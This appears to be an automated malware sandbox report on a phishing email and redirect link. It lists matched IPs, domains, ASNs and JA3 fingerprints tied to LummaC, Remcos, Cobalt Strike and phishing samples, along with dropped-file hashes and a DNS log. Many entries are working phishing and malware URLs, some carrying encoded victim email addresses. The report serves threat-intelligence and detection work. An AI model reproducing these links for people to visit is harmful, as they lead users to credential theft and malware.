Screenshot	https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
Screenshot	https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
Screenshot	https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
Screenshot	https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
Screenshot	https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
Screenshot	https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
Screenshot	https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
Screenshot	https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
154.216.17.193	#U051d==.eml	Get hash	malicious	Unknown	Browse
	Annual_Benefits_&_Bonus_for_Lorne.zuck#IyNURVhUTlVNUkFORE9NNDUjIw==.docx	Get hash	malicious	Unknown	Browse
	Benefits_&_Bonus_for_Dan.banks#IyNURVhUTlVNUkFORE9NNDUjIw==.docx	Get hash	malicious	Unknown	Browse
	https://tenereteam.digidip.net/visit?url=https%3A%2F%2Fzp73eW7jfL3crnrfCoQ60D1yS.adpk.com.br/xQwrPPjghfe/viWyugvQwer/bvdfreGhjik/saQriuhbT/SWn28u/ZnVjay55b3VAd2hhdGV2ZXIuY29t	Get hash	malicious	Unknown	Browse
	doc_Agilitas_9769667025.html	Get hash	malicious	Phisher	Browse
13.107.246.44	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	https://stopify.co/BOAZ81	Get hash	malicious	Unknown	Browse
104.18.94.41	https://www.summerfetes.co.uk/directory/jump.php?id=http://myronivkanews.com	Get hash	malicious	Phisher	Browse
	http://login.nojustgive.com/ueAQYUzz	Get hash	malicious	HTMLPhisher	Browse
	Benefits_Update_2024.pdf	Get hash	malicious	Unknown	Browse
	Benefits_Update_2024.pdf	Get hash	malicious	Unknown	Browse
	https://jammyjetscorp.uk/PurchaseLedgerRemittanceAdvice/PDF	Get hash	malicious	Unknown	Browse
	https://www.google.es/url?q=queryri4m(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fmediamei.com.br%2fdada%2funcz66ahtgqg1jqqmvsnfzkcw2oylxhqc48ee/YW5pbWFsaWFAYW5pbWFsaWEubm8=$?	Get hash	malicious	Unknown	Browse
	https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==	Get hash	malicious	Unknown	Browse
	Ssc Executed Docs#962297(Revised).docx	Get hash	malicious	Unknown	Browse
	https://deliversystand.com/	Get hash	malicious	Unknown	Browse
	https://deliversystand.com/	Get hash	malicious	Unknown	Browse
13.107.246.60	https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1v	Get hash	malicious	Unknown	Browse	www.mimecast.com/Customers/Support/Contact-support/
13.107.246.60	http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5	Get hash	malicious	Unknown	Browse	wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0016.t-0009.t-msedge.net	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.44
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.44
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.44
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.44
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	13.107.246.44
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	13.107.246.44
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.44
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.44
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.44
	https://stopify.co/BOAZ81	Get hash	malicious	Unknown	Browse	13.107.246.44
sepedatua.com	phish_alert_iocp_v1.4.48 (68).eml	Get hash	malicious	Unknown	Browse	103.134.152.12
	http://samobile.net/content/offsite_article.html?url=https%3A%2F%2Fsepedatua.com%2F158983%2Fsecure-redirect%23cnichols%2Bderickdermatology.com&headline=New+Jerusalem%2C+The+by+Chesterton%2C+G.+K	Get hash	malicious	Captcha Phish	Browse	103.134.152.12
	Pmendon.ext_Reord_Adjustment.docx	Get hash	malicious	Captcha Phish	Browse	103.134.152.12
	https://insidesales-email.com:443/l/1/17014050/Y/useast1-a-2021.09.07-11929645/1/ab/Dyn0a6AiyEfbGyJK116Prl6kZkPYRyBwA4ljCxkDy74?lnk=https://sepedatua.com/zfr681#elam+exeterfinance.com	Get hash	malicious	HTMLPhisher	Browse	103.134.152.12
bc1qv5p8dwc98n3judrczkmpkjz.com	#U051d==.eml	Get hash	malicious	Unknown	Browse	188.114.97.3
bc1qv5p8dwc98n3judrczkmpkjz.com	Annual_Benefits_&_Bonus_for_Lorne.zuck#IyNURVhUTlVNUkFORE9NNDUjIw==.docx	Get hash	malicious	Unknown	Browse	188.114.97.3
r.neurotags.net	Pmendon.ext_Reord_Adjustment.docx	Get hash	malicious	Captcha Phish	Browse	34.168.114.70
cdnjs.cloudflare.com	https://www.summerfetes.co.uk/directory/jump.php?id=http://myronivkanews.com	Get hash	malicious	Phisher	Browse	104.17.25.14
	https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	104.17.25.14
	https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuY	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	phish_alert_sp1_1.0.0.0(1).eml	Get hash	malicious	KnowBe4	Browse	104.17.24.14
	https://shorturl.at/cQwea	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://jammyjetscorp.uk/PurchaseLedgerRemittanceAdvice/PDF	Get hash	malicious	Unknown	Browse	104.17.25.14
	#U051d==.eml	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://www.google.es/url?q=queryri4m(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fmediamei.com.br%2fdada%2funcz66ahtgqg1jqqmvsnfzkcw2oylxhqc48ee/YW5pbWFsaWFAYW5pbWFsaWEubm8=$?	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://ow.ly/ok9750U8Nry#jeanette.marais@mmltd.co.za	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	104.17.25.14
	https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==	Get hash	malicious	Unknown	Browse	104.17.24.14

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.44
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	94.245.104.56
	FRSSDE.exe	Get hash	malicious	Remcos	Browse	94.245.104.56
	https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854	Get hash	malicious	Unknown	Browse	150.171.27.10
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
	phish_alert_sp1_1.0.0.0.eml	Get hash	malicious	Unknown	Browse	13.89.178.27
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	new.bat	Get hash	malicious	Unknown	Browse	154.216.17.175
	ungziped_file.exe	Get hash	malicious	Remcos	Browse	154.216.20.185
	iwir64.elf	Get hash	malicious	Mirai	Browse	154.216.16.109
	#U051d==.eml	Get hash	malicious	Unknown	Browse	154.216.17.193
	Annual_Benefits_&_Bonus_for_Lorne.zuck#IyNURVhUTlVNUkFORE9NNDUjIw==.docx	Get hash	malicious	Unknown	Browse	154.216.17.193
	driver1.exe	Get hash	malicious	Unknown	Browse	154.216.19.63
	driver1.exe	Get hash	malicious	Unknown	Browse	154.216.19.63
	new.bat	Get hash	malicious	Unknown	Browse	154.216.17.175
	Benefits_&_Bonus_for_Dan.banks#IyNURVhUTlVNUkFORE9NNDUjIw==.docx	Get hash	malicious	Unknown	Browse	154.216.17.193
	file.exe	Get hash	malicious	Remcos	Browse	154.216.20.185
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.44
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	94.245.104.56
	FRSSDE.exe	Get hash	malicious	Remcos	Browse	94.245.104.56
	https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854	Get hash	malicious	Unknown	Browse	150.171.27.10
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
	phish_alert_sp1_1.0.0.0.eml	Get hash	malicious	Unknown	Browse	13.89.178.27
CLOUDFLARENETUS	DRP130636747.pdf	Get hash	malicious	Unknown	Browse	104.18.10.207
	gP5rh6fa0S.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://t.co/D4HGMmKLnL	Get hash	malicious	Unknown	Browse	162.159.140.229
	FRSSDE.exe	Get hash	malicious	Remcos	Browse	172.64.41.3
	http://bit.ly/e0Mw9w	Get hash	malicious	Unknown	Browse	172.67.154.157
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	https://www.summerfetes.co.uk/directory/jump.php?id=http://myronivkanews.com	Get hash	malicious	Phisher	Browse	104.16.123.96
	https://acrobatsign.us.com/D5QtQ3EphanI1AQ3Ez01thoTxmaD5Q2AP4DCaI1AI1AchI1A-D5QankyoTxz01Q3Eu	Get hash	malicious	Unknown	Browse	172.67.189.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	DRP130636747.pdf	Get hash	malicious	Unknown	Browse	172.202.163.200 204.79.197.200 204.79.197.222 40.126.32.68 52.108.10.254
	https://moonoafy.net	Get hash	malicious	Unknown	Browse	172.202.163.200 204.79.197.200 204.79.197.222 40.126.32.68 52.108.10.254
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.202.163.200 204.79.197.200 204.79.197.222 40.126.32.68 52.108.10.254
	file.exe	Get hash	malicious	LummaC	Browse	172.202.163.200 204.79.197.200 204.79.197.222 40.126.32.68 52.108.10.254
	https://t.co/D4HGMmKLnL	Get hash	malicious	Unknown	Browse	172.202.163.200 204.79.197.200 204.79.197.222 40.126.32.68 52.108.10.254
	FRSSDE.exe	Get hash	malicious	Remcos	Browse	172.202.163.200 204.79.197.200 204.79.197.222 40.126.32.68 52.108.10.254
	http://bit.ly/e0Mw9w	Get hash	malicious	Unknown	Browse	172.202.163.200 204.79.197.200 204.79.197.222 40.126.32.68 52.108.10.254
	https://www.summerfetes.co.uk/directory/jump.php?id=http://myronivkanews.com	Get hash	malicious	Phisher	Browse	172.202.163.200 204.79.197.200 204.79.197.222 40.126.32.68 52.108.10.254
	https://acrobatsign.us.com/D5QtQ3EphanI1AQ3Ez01thoTxmaD5Q2AP4DCaI1AI1AchI1A-D5QankyoTxz01Q3Eu	Get hash	malicious	Unknown	Browse	172.202.163.200 204.79.197.200 204.79.197.222 40.126.32.68 52.108.10.254
	https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854	Get hash	malicious	Unknown	Browse	172.202.163.200 204.79.197.200 204.79.197.222 40.126.32.68 52.108.10.254
6271f898ce5be7dd52b0fc260d0662b3	phish_alert_sp1_1.0.0.0(1).eml	Get hash	malicious	KnowBe4	Browse	2.23.209.179
	REMITTANCE_Confrimationsslip54342Bqlaw.html	Get hash	malicious	Unknown	Browse	2.23.209.179
	Signert kontrakt og faktura.xls	Get hash	malicious	Unknown	Browse	2.23.209.179
	New order.xls	Get hash	malicious	Unknown	Browse	2.23.209.179
	purchase order (2).xls	Get hash	malicious	Unknown	Browse	2.23.209.179
	file.exe	Get hash	malicious	LummaC	Browse	2.23.209.179
	ProtectedDoc.docx	Get hash	malicious	KnowBe4	Browse	2.23.209.179
	Mark Qualman.zip	Get hash	malicious	Unknown	Browse	2.23.209.179
	https://www.zealxllc.com/sgv	Get hash	malicious	Unknown	Browse	2.23.209.179
	https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDg	Get hash	malicious	HTMLPhisher	Browse	2.23.209.179
3b5074b1b5d032e5620f69f9f700ff0e	DRP130636747.pdf	Get hash	malicious	Unknown	Browse	13.107.5.88
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	13.107.5.88
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.5.88
	Order88983273293729387293828PDF.exe	Get hash	malicious	Quasar	Browse	13.107.5.88
	https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854	Get hash	malicious	Unknown	Browse	13.107.5.88
	https://www.google.co.th/url?q=sf_rand_string_uppercase(33)uQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%20xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%65%73%74%73%63%72%65%65%6E%69%6E%67%73%65%72%76%69%63%65%2E%63%6F%6D%2F%77%69%6E%6E%6D%2F%6B%6F%6C%69%6E%6E%2F%6B%6F%6F%6C%2Ftest@gmail.com	Get hash	malicious	Unknown	Browse	13.107.5.88
	https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/kovitz.net%2Fyvbw%2F9424537096/ZGViQG1hcnRpbmpveWNlLmNvbQ==	Get hash	malicious	Unknown	Browse	13.107.5.88
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	13.107.5.88
	phish_alert_sp1_1.0.0.0(1).eml	Get hash	malicious	KnowBe4	Browse	13.107.5.88
	voi.bat	Get hash	malicious	Unknown	Browse	13.107.5.88

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	338
Entropy (8bit):	3.459804934679828
Encrypted:	false
SSDEEP:	6:kKpcW8oJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:t4kPlE99SCQl2DUevat
MD5:	EB916C2D7DC76806A6BF2687E50E6F0D
SHA1:	75D39C1B04B85828A086D9E332BD06014574BADD
SHA-256:	DEBCB30475A95EC3B3C27EA695338C7EF90DB2A64F9226D112F69B2D8BC4AEDD
SHA-512:	4AD6DCAAA2F7D63250E49C9F8E0AD72D55FAAD186A3AB1FD5B99BF15A0915EAFF904B7C0501DC062999B9682C94D4BA59341679D036517D0847452BA458B5A82
Malicious:	false
Reputation:	low
Preview:	p...... .............9..(...............................................B:.VZ.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 15:55:41 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9915981048095572
Encrypted:	false
SSDEEP:	48:8w4dq4TXQ7FhHgidAKZdA1JehwiZUklqehwy+3:8w34boQLy
MD5:	8001C4DAB990F4316909251E0AD43294
SHA1:	0538A66E688C660DBA6AC5DA18CD481A398613B1
SHA-256:	90366C5E1A2CB620DB79689E6D2EC42E0C2768226970B0404F3A526665CF772E
SHA-512:	EF8B6BDB1687666406A1135D2C62C8339A827D7747FF6AB5ECC41B75B1E4605D3BE03C114616D373DB3A00BD06236B81F5B428027B282582D139ECEB8573AEC1
Malicious:	false
Preview:	L..................F.@.. ...$+.,....=.I..9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IrY.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VrY.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VrY............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............[......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 17:55:39.498420000 CET	49551	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:39.498692989 CET	52793	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:39.784553051 CET	53	52423	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:39.785670996 CET	53	62792	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:39.787935019 CET	53	52793	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:39.924262047 CET	53	49551	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:40.846175909 CET	64279	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:40.846457958 CET	61546	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:41.227804899 CET	53	65124	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:41.237345934 CET	53	61546	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:41.328682899 CET	53	64279	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:44.095904112 CET	56837	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:44.096046925 CET	65016	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:44.102756977 CET	53	56837	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:44.103127003 CET	53	65016	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:44.416136026 CET	50953	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:44.416357040 CET	60942	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:44.700195074 CET	53	60942	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:44.723469973 CET	53	50953	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:45.749808073 CET	56370	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:45.749942064 CET	62105	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:45.758433104 CET	53	56370	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:45.758544922 CET	53	62105	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:47.928811073 CET	49869	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:47.928957939 CET	65254	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:47.935441971 CET	50007	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:47.935741901 CET	53	65254	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:47.935777903 CET	53	49869	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:47.935801983 CET	57596	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:55:47.942389965 CET	53	50007	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:47.943145037 CET	53	57596	1.1.1.1	192.168.2.17
Nov 18, 2024 17:55:58.188349009 CET	53	50484	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:03.700576067 CET	51348	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:03.700778008 CET	55058	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:03.707871914 CET	53	51348	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:03.707911968 CET	53	55058	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:05.060878038 CET	56942	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:05.060878038 CET	54210	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:05.068664074 CET	53	56942	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:05.068689108 CET	53	54210	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:05.078017950 CET	53898	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:05.081415892 CET	60365	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:06.099852085 CET	63260	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:06.100054979 CET	51015	53	192.168.2.17	1.1.1.1
Nov 18, 2024 17:56:06.218703985 CET	53	60365	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:06.980901003 CET	53	53898	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:07.096972942 CET	53	51015	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:07.652966022 CET	53	63260	1.1.1.1	192.168.2.17
Nov 18, 2024 17:56:10.140191078 CET	51703	53	192.168.2.17	1.1.1.1
